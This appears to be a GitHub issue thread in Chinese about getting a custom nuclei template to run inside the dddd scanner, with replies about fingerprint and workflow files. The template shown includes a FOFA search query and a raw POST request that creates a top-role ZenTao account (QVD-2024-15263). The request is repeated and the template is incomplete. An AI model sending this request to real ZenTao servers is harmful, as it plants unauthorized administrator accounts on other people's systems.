Open ljlsec opened 1 month ago
大佬,自己加的有的yaml怎么无法nuclei扫到呢,是不是内置nuclei太老了。用nuclei可以扫到,但是用dddd加nucleiyaml就不行。 yaml如下
`id: chandao-QVD-2024-15263
info: tags: chandao-QVD-2024-15263 name: chandao-QVD-2024-15263 author: github severity: high description: |- fofa: title="Login - ZenTao", app="易软天创-禅道系统"
variables: account: '{{rand_base(6)}}' password: 'Admin123@'
http:
raw:
| POST /zentao/api.php/v1/users HTTP/1.1 Cookie: {{cookie1}} Host: {{Hostname}}
{"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}
extractors:
matchers:
worlflow这样写
易软天创-禅道系统: type:
我也碰到了,加了指纹和工作流,也识别不到
这是nuclei太老了,不支持3.3语法
首先,你要先在finger.yaml里面加上指纹,然后再把workflow.yaml里面加上指纹名称和对应的poc,就可以扫到了。
多去熟悉一下finger.yaml和workflow.yaml就知道规律了
大佬,自己加的有的yaml怎么无法nuclei扫到呢,是不是内置nuclei太老了。用nuclei可以扫到,但是用dddd加nucleiyaml就不行。 yaml如下
`id: chandao-QVD-2024-15263
info: tags: chandao-QVD-2024-15263 name: chandao-QVD-2024-15263 author: github severity: high description: |- fofa: title="Login - ZenTao", app="易软天创-禅道系统"
variables: account: '{{rand_base(6)}}' password: 'Admin123@'
http:
raw:
| POST /zentao/api.php/v1/users HTTP/1.1 Cookie: {{cookie1}} Host: {{Hostname}}
{"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}
| POST /zentao/api.php/v1/users HTTP/1.1 Cookie: {{cookie1}} Host: {{Hostname}}
{"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}
extractors:
matchers:
worlflow这样写
易软天创-禅道系统: type: